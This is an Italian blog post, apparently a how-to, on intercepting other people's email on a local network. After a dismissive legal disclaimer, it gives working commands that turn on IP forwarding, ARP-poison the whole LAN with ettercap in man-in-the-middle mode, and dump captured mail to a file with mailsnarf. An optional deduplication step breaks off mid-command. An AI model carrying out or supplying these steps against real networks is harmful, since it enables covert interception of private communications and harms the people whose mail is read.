Paraculaggine: è illegale intercettare le comunicazioni altrui senza permesso e blablabla, i test sono stati eseguiti in una rete simulata. Se fate cavolate e vi beccano sono solo affaracci vostri.
Prima di tutto ci servono i programmi dsniff, ettercap ed opzionalmente procmail; quindi installateli usando i pacchetti della vostra distribuzione.
Avviamo ettercap in modalità MITM only avendo precedentemente attivato il forwarding dei pacchetti (ATTENZIONE: se non attivate il forwarding dei pacchetti la rete smetterà di funzionare):
# sysctl -w net.ipv4.ip_forward=1
# ettercap -o -M arp:remote // //
Da un altro terminale avviamo mailsnarf (che fa parte del pacchetto dsniff) e salviamo le mail in un file:
# mailsnarf > /var/tmp/mail.tmp
(opzionale) Eliminare le mail duplicate
$ cat > /var/tmp/procmail <
No comments:
Post a Comment